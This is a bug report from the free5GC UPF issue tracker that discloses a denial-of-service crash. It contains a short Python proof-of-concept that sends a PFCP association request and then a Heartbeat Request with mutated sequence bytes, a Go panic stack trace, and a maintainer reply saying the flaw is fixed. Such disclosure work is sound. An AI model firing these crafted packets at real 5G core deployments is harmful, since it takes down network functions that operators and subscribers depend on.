[Bugs] UPF crash caused by malformed PFCP messages whose Sequence Number is mutated to overflow bytes

[tjbdlq]

[Bugs] UPF crash caused by malformed PFCP message whose Sequence Number is mutated to overflow bytes

Describe the bug

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Sequence Number is mutated to overflow bytes (e.g. 0xFF 0xFF 0xFF 0xFF). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

To Reproduce

Steps to reproduce the behavior:

1. Build the UPF with source code
2. Run the bin/upf with default config/upfcfg.yaml
3. Run the following POC python script

#!/usr/bin/env python3

import socket

udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.settimeout(1.0)

pfcp_association_setup_request = b'\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00'

pfcp_heartbeat_request = b'\x20\x01\x00\x0f\x00\x00\x00\xff\xff\xff\x00\x00\x60\x00\x04\xe8\x1f\xdc\x30'

udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8', 8805))
try:
   udp_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8', 8805))
try:
   udp_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp_socket.close()

Expected behavior

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the total length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

Screenshots

No special screenshot is provided.

Environment (please complete the following information):

• free5GC Version: v3.3.0
• OS: Ubuntu 20.04
• Kernel version: 5.4.5-050405-generic
• go version: go1.21.1 linux/amd64

Trace File

Configuration File

No specific configuration is required.

PCAP File

No specific pcap file is provided.

Log File

2023-10-24T17:49:15.614745280+08:00 [INFO][UPF][CFG] ==================================================
2023-10-24T17:49:15.614761831+08:00 [INFO][UPF][Main] Log level is set to [info]
2023-10-24T17:49:15.614777264+08:00 [INFO][UPF][Main] Report Caller is set to [false]
2023-10-24T17:49:15.614837834+08:00 [INFO][UPF][Main] starting Gtpu Forwarder [gtp5g]
2023-10-24T17:49:15.614864772+08:00 [INFO][UPF][Main] GTP Address: "127.0.0.8:2152"
2023-10-24T17:49:15.650332227+08:00 [INFO][UPF][BUFF] buff netlink server started
2023-10-24T17:49:15.650439249+08:00 [INFO][UPF][Perio] perio server started
2023-10-24T17:49:15.650444691+08:00 [INFO][UPF][Gtp5g] Forwarder started
2023-10-24T17:49:15.652112097+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] starting pfcp server
2023-10-24T17:49:15.652132290+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] pfcp server started
2023-10-24T17:49:15.652138607+08:00 [INFO][UPF][Main] UPF started
2023-10-24T17:50:42.343823681+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] handleAssociationSetupRequest
2023-10-24T17:50:42.343962121+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805][CPNodeID:10.100.200.100] New node
2023-10-24T17:50:42.347048969+08:00 [FATA][UPF][PFCP][LAddr:127.0.0.8:8805] panic: runtime error: slice bounds out of range [6:4]
goroutine 10 [running]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:24 +0x65
github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main.func1()
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x5d
panic({0x860400, 0xc000490210})
	/usr/local/go/src/runtime/panic.go:1038 +0x215
github.com/wmnsk/go-pfcp/ie.(*IE).UnmarshalBinary(0x10000c0000cbb30, {0xc000490200, 0x20, 0x30})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:371 +0x1a5
github.com/wmnsk/go-pfcp/ie.Parse({0xc000490200, 0xb, 0xb})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:339 +0x48
github.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc000490200, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:632 +0x8c
github.com/wmnsk/go-pfcp/message.(*HeartbeatRequest).UnmarshalBinary(0xc000096720, {0xc0004901f8, 0x0, 0xadaa82a41536e5d2})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0x6e
github.com/wmnsk/go-pfcp/message.Parse({0xc0004901f8, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x3ab
github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main(0xc000400a90, 0xc0004030d0)
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x4ce
created by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).Start
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xd2

[brianchennn]

@tjbdlq
This issue has been fixed in upf commit: free5gc/go-upf@78a6a67

go-pfcp v0.0.22 has fixed the malformed PFCP messages handling.